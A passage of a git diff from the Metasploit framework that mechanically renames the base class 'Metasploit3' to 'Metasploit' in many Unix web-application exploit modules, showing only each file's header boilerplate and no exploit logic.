Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index f530c09ab0..d1838cb8c8 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index 2ae8d9d41a..0746d5f2dd 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index 5d3afc9353..d63bf79243 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index bc505ad66f..d8e3a6d2ee 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/unix/webapp/graphite_pickle_exec.rb b/modules/exploits/unix/webapp/graphite_pickle_exec.rb index 29ebbb1775..4a2b6f103a 100644 --- a/modules/exploits/unix/webapp/graphite_pickle_exec.rb +++ b/modules/exploits/unix/webapp/graphite_pickle_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 53b9e6911c..d070d1943a 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 8840dc855c..159a78f211 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index f76388a42d..5eed7460f8 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index ecfd1ac294..92603757fa 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 6b495eed60..3249bdbe52 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # application config.php is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/instantcms_exec.rb b/modules/exploits/unix/webapp/instantcms_exec.rb index 0fb2359c31..8f8b0d20e0 100644 --- a/modules/exploits/unix/webapp/instantcms_exec.rb +++ b/modules/exploits/unix/webapp/instantcms_exec.rb @@ -1,7 +1,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index e2b2f8b485..8359d294f7 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 7836c4732d..e049f30917 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index af1204f917..433356e15f 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index a48ba48d99..ffaf82fa2c 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 5d2cb35756..454707c406 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 5286bf927d..989004a81a 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index 51c9a53ffa..4f9ff8f64e 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index b68a39ed2e..a1b4155dfe 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index 8524edfb3a..8003836d9e 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index ad270f3590..b9b854e64d 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index 8179ffc36a..81d768744e 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb index 1f0f109a81..9013332793 100644 --- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb +++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 3f92aa03d9..a8205eb82c 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index 3f0ec69676..a03be54728 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index dde396f3d6..6a582e2e95 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 44a9e6123d..3729806650 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index 8660cf678d..58ea83697b 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index e7d56fcd2f..b3d59db130 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 8e91a2ef42..449fed46c8 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index df8f0518c8..96e70e6cea 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 25611c3bcb..7a2ece3151 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index d271d446fa..5cf731b7f4 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index d76318ede7..6d65ea96c7 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index c9afc417e0..ea72e1c85c 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 51d6d0c8f9..b23d42d57f 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index d53edeb6e2..4196dd206b 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 3c4ca54256..2021c9a45e 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 4c57758421..773d1c322f 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 960c8387dd..870196bdb1 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index c8edda9b97..d29a093fe7 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 996a060a4b..c91a8b6aa7 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 009305625b..bd4b0db52f 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 9775cd9fb0..9e395b9a00 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 71382a1f17..1ee479a03f 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index e01415cfb4..7298327f22 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 5e43183164..e573606b50 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index 113f7cc419..f1422ecc55 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index 8f8da55d8e..05f81d3b63 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 4d18db356b..7a95d1af01 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 9a75e1d9cb..44670a1c2c 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index 5575ae12fc..04aafff970 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index fdfed0a499..56ffef3921 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index 06bd9ecd7c..676eb5848a 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb index a8303ca871..ad9eef9f6c 100644 --- a/modules/exploits/unix/webapp/squash_yaml_exec.rb +++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index a116da0fa5..9173f42b2d 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 918ff7cfb7..e877ea0118 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 04e6167531..84b62ca665 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index a1ba47c228..7fac1e1a66 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index 3f6e06931e..9c24bcf127 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 817d0d3a3e..8d9a1e693f 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -6,7 +6,7 @@ # -*- coding: utf-8 -*- require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/ diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index 